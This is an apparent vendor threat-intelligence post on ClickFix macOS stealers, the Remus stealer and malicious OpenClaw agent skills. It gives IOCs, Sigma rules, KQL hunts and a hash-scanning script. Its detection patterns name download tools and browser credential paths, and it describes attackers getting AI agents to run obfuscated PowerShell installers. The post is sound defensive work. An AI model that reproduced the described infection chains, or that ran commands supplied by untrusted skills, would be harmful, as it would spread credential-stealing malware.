Back to Intelligence

Remus Stealer, ClickFix macOS Infostealers, and Malicious OpenClaw Skills: OTX Pulse Analysis — Enterprise Detection Pack

SA
Security Arsenal Team
May 10, 2026
5 min read

Recent OTX pulses highlight a surge in criminally motivated campaigns utilizing evolving social engineering and supply chain attacks. Threat actors are actively targeting macOS users with ClickFix campaigns—luring victims into executing malicious Terminal commands disguised as utility fixes—delivering families like Macsync, Shub Stealer, and AMOS. Simultaneously, the Windows ecosystem faces a significant evolution in information stealers with Remus, a successor to Lumma Stealer designed to bypass application-bound encryption. Furthermore, attackers have weaponized the AI ecosystem by publishing malicious OpenClaw skills that distribute Remcos RAT and GhostLoader, leveraging AI agents to execute obfuscated PowerShell commands.

Threat Actor / Malware Profile

ClickFix & macOS Infostealers

  • Malware Families: Macsync, Shub Stealer, AMOS, PhantomPulse.
  • Distribution Method: Social engineering via blog sites and content platforms hosting fake troubleshooting guides. Victims are tricked into running specific Terminal commands.
  • Payload Behavior: Commands downloaded via curl or similar tools, often piped to bash, fetch and execute the infostealer.
  • Objective: Exfiltration of system data, iCloud keychains, and browser credentials.

Remus Stealer (Lumma Evolution)

  • Malware Family: Remus (evolution of Lumma Stealer).
  • Origin: Emerged following the doxxing of Lumma Stealer core members in late 2025.
  • Capability: 64-bit info-stealer specifically designed to bypass browser application-bound encryption, targeting credentials and cryptocurrency wallets.
  • C2 & Persistence: Uses innovative injection techniques and likely Ethereum blockchain-related C2 obfuscation (Etherhiding) for resilience.

OpenClaw / Remcos RAT

  • Malware Families: Remcos RAT, GhostLoader.
  • Vector: "DeepSeek-Claw" skill within the OpenClaw AI agent framework.
  • Attack Chain: The skill provides malicious installation instructions -> AI/Developer executes PowerShell command -> Downloads MSI package -> Sideloads malicious DLL via signed GoToMeeting executable (GhostLoader technique).
  • Behavior: Remote Access Trojan (RAT) capabilities allowing full control, surveillance, and data theft.

IOC Analysis

The provided indicators cover multiple infrastructure types:

  • Domains: Multiple suspicious domains (e.g., jihiz.com, malext.com, dropras.xyz) associated with ClickFix and OpenClaw C2 hosting. SOC teams should block these at the DNS/Proxy level.
  • IPv4 Addresses: C2 infrastructure including 45.94.47.204 (ClickFix) and 217.156.122.x subnet (Remus). These should be blocked on firewalls and analyzed for historical logs.
  • File Hashes (MD5/SHA1): Specific to the Remcos/GoToMeeting MSI packages (e.g., 1c267cab0a800a7b2d598bc1b112d5ce). EDR solutions should be configured to alert on execution or presence of these hashes.

Detection Engineering

YAML
---
id: 9a8b7c6d-1e2f-3a4b-5c6d-7e8f9a0b1c2d
title: PowerShell Command Downloads MSI File - OpenClaw Vector
description: Detects PowerShell commands that download MSI files, a technique observed in the OpenClaw campaign delivering Remcos RAT via DeepSeek-Claw skills.
status: experimental
author: Security Arsenal
date: 2026/05/11
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'wget'
            - 'curl'
            - 'DownloadFile'
    filter_extension:
        CommandLine|contains: '.msi'
    condition: selection and filter_extension
falsepositives:
    - System administration software installation
level: high
---
id: b1c2d3e4-5f6a-7b8c-9d0e-1f2a3b4c5d6e
title: Potential Remcos RAT Installation - Registry Key
description: Detects the creation of registry keys often used by Remcos RAT for persistence, as seen in the OpenClaw/Remcos campaign.
status: experimental
author: Security Arsenal
date: 2026/05/11
tags:
    - attack.persistence
    - attack.t1547.001
logsource:
    product: windows
    category: registry_add
detection:
    selection:
        TargetObject|contains:
            - '\Software\Microsoft\Windows\CurrentVersion\Run'
            - '\Software\Microsoft\Windows\CurrentVersion\RunOnce'
        Details|contains:
            - 'Remcos'
            - 'System32\remcos'
    condition: selection
falsepositives:
    - Legitimate software using similar names (rare)
level: high
---
id: c2d3e4f5-6a7b-8c9d-0e1f-2a3b4c5d6e7f
title: Browser Encryption Bypass Attempt - Suspicious Process Access
description: Detects processes accessing browser databases (Cookies, History) with suspicious handle access patterns, indicative of stealers like Remus/Lumma attempting ABE bypass.
status: experimental
author: Security Arsenal
date: 2026/05/11
tags:
    - attack.credential_access
    - attack.t1005
logsource:
    product: windows
    category: process_access
detection:
    selection_target:
        TargetImage|contains:
            - '\Google\Chrome\User Data\Default\'
            - '\Microsoft\Edge\User Data\Default\'
            - '\BraveSoftware\Brave-Browser\User Data\Default\'
    selection_granted:
        GrantedAccess|contains:
            - '0x1010'
            - '0x1410'
            - '0x143a'
    condition: selection_target and selection_granted
falsepositives:
    - Legitimate backup or browser management tools
level: medium


kql
// Hunt for connections to known Remus and ClickFix IPs
DeviceNetworkEvents
| where RemoteIP in ("45.94.47.204", "217.156.122.57", "217.156.122.75", "217.156.122.12", "45.151.106.110")
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteIP, RemoteURL, InitiatingProcessCommandLine

// Hunt for execution of file hashes associated with OpenClaw/Remcos
DeviceProcessEvents
| where SHA1 in ("470c3803bd5a4770eb5470a84a831f187f591c64") or MD5 in ("1c267cab0a800a7b2d598bc1b112d5ce", "2a5f619c966ef79f4586a433e3d5e7ba", "2c4b7c8b48e6b4e5f3e8854f2abfedb5", "82536825e700f4c863238a90dd314687", "cc1af839a956c8e2bf8e721f5d3b7373")
| project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, AccountName


powershell
# IOC Hunt Script for Remcos/Remcos Related Files
# Checks for specific MD5 hashes mentioned in the OpenClaw pulse

$targetHashes = @(    "1c267cab0a800a7b2d598bc1b112d5ce",
    "2a5f619c966ef79f4586a433e3d5e7ba",
    "2c4b7c8b48e6b4e5f3e8854f2abfedb5",
    "82536825e700f4c863238a90dd314687",
    "cc1af839a956c8e2bf8e721f5d3b7373"
)

Write-Host "Scanning for malicious file hashes..." -ForegroundColor Yellow

# Get files in common download/appdata directories (limit to last 7 days for performance)
$paths = @("$env:USERPROFILE\Downloads", "$env:APPDATA", "$env:LOCALAPPDATA")

foreach ($path in $paths) {
    if (Test-Path $path) {
        Get-ChildItem -Path $path -Recurse -File -ErrorAction SilentlyContinue | 
        Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) } | 
        ForEach-Object {
            $hash = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
            if ($hash -in $targetHashes) {
                Write-Host "[MATCH] Malicious file found: $($_.FullName)" -ForegroundColor Red
                Write-Host "Hash: $hash" -ForegroundColor Red
            }
        }
    }
}

Write-Host "Scan complete."


# Response Priorities

*   **Immediate**:
    *   Block all listed domains and IP addresses at the perimeter firewall and proxy servers.
    *   Initiate a hunt for the specific file hashes provided in the OpenClaw pulse across all endpoints.
    *   Review DNS logs for resolutions to `dropras.xyz` and `trackpipe.dev`.

*   **24 Hours**:
    *   **Credential Audit**: Given the Remus Stealer's capability to bypass browser encryption, force a password reset for high-privilege accounts and users who may have been exposed to the ClickFix or Remos campaigns.
    *   **Session Review**: Analyze Active Directory logs for anomalous logon attempts originating from the Remus C2 IP ranges.

*   **1 Week**:
    *   **Browser Hardening**: Enforce Enterprise Browser policies to disable or restrict developer tools and extensions where possible to mitigate infostealer impact.
    *   **AI Governance**: Review and restrict the usage of AI agent frameworks (like OpenClaw) within the development environment. Implement strict sandboxing for code generated by AI agents.
    *   **macOS Security**: Deploy configuration profiles to restrict the execution of unsigned terminal commands or scripts downloaded from the internet (Gatekeeper hardening).

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-malwareremus-stealerclickfixremcos-ratopenclawinfostealer

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action